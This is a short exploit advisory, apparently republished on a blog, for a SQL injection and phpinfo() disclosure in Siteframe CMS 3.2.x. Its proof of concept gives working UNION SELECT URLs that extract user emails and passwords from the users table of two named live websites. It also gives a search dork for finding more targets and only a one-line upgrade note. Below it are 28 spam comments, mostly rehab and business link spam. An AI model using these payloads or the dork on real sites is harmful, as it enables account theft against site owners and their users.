Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vuln


[o] Siteframe CMS 3.2.x SQL Injection & phpinfo() Disclosure Vulnerability

Software : Siteframe CMS version 3.2.x
Vendor : http://siteframe.org/
Download : http://sitefrane.org/downloads/
Author : NoGe



[o] Description
Siteframe™ is a lightweight content-management system
designed for the rapid deployment of community-based websites.
With Siteframe, a group of users can share stories and photographs,
create blogs, send email to one another, and participate in group activities.
Siteframe enables this by providing web-based content management
so that anyone can create content without needing to learn HTML.


[o] Vulnerable file
document.php


[o] Exploit
http://localhost/[path]/document.php?id=[SQL]
http://localhost/[path]/phpinfo.php


[o] Proof of concept
http://digi-forum.com/frame/document.php?id=10+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://digi-forum.com/frame/phpinfo.php
http://myolympus.org/document.php?id=15570+and+1=2+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user_email,user_passwd),11,12+from+users--
http://myolympus.org/phpinfo.php


[o] Dork
"Powered by Siteframe"


[o] Notes
Upgrade Siteframe CMS from 3.2.x to 5.0.6 (lastest)


28 Responses so far.

  1. Jessica says:

    Depending on your needs, the website CMS system can be as basic or detailed as you'd like.

  2. Anonymous says:

    This article hit home. When I needed to go to sober living I found that these guys were caring and compassionate.

  3. stacy says:

    Do you need info on an drug rehab centers? Then articles like this one can really help you out. Thanks for posting.

  4. Brian says:

    Do you need info on different types of eating disorders? Then articles like this one can really help you out. Thanks for posting.

  5. We all need help sometimes and when I needed cocaine treatment I knew there was somewhere I could turn.

  6. John says:

    Great post and informative. Finding the right abogado is very important when you need to deal with a law situation.

  7. stacy says:

    Getting info on government software systems can help your company grow quickly and with efficiency.

  8. Brian says:

    Sweet ideas! Thanks for posting. When I was looking for new kitchen cabinets I went with these guys. Great prices and selection.

  9. John says:

    When our practice got started we needed correctional billing services help. These were the guys we turned to and they did a great job.

  10. brian7 says:

    Great post! I've also found that doing web design freelance work has helped me succeed.

  11. stacy says:

    Great technology post, thanks. I found some whole house automation that were better than most!

  12. Tony Raz says:

    Thanks for the post. If you need help with solar panel installation then this company is for you.

  13. John says:

    For over 10 years I was an addict and needed k2 spice help. When I got it, I could start living my life again.

  14. Dallas says:

    We all need help sometimes and when I needed to know how to make meth. I knew there was somewhere I could turn.

  15. Brian says:

    Getting info on government crm can help your company grow quickly and with efficiency.

  16. Brian says:

    When I needed to find a recovery school these guys made the difference. They gave me the help I needed and it made a big difference for the rest of my life. 4 years sober!

  17. stacy says:

    Do you need info on christian rehab centers? Then articles like this one can really help you out. Thanks for posting.

  18. John says:

    When I was looking for help with compulsive overeating I didn’t know where to turn. I finally went with this center and they helped me save my life.

  19. This is a great post for anyone that needs help with finding legal advice. I found a fire insurance claim in the Los Angeles area that helped me get to the bottom of my civil suit.

  20. John says:

    For over 10 years I was an addict and needed mental health California help. When I got the help I needed, I could start living my life again.

  21. Tony Raz says:

    This article hit home. When I needed help with anorexia treatment clinic I didn’t know where to get help.

  22. Brian says:

    Don’t let coke take over your life. You can get dual diagnosis program help today. Turn to someone who can help.

  23. When our practice got started we needed Microsoft dynamics California help. These were the guys we turned to and they did a great job.

  24. stacy says:

    When my business needed help with web copywriter we turned to these guys. They were quick and professional.

  25. stacy says:

    When I needed to work with a company that was a Microsoft dynamics training. Then I knew that I had found software company that means business.

  26. brian7 says:

    If you’re interested in using Microsoft dynamics sl for your business then this company can really help you out. They have the knowledge and know how to make your business grow.

  27. John says:

    Do you need some info on great plains software los angeles? Then doing research on the internet should help you out. Good luck!

  28. Dallas says:

    Thanks for the post. Technology can be hard to utilize but, if you need to find website design orange county ca then help is out there.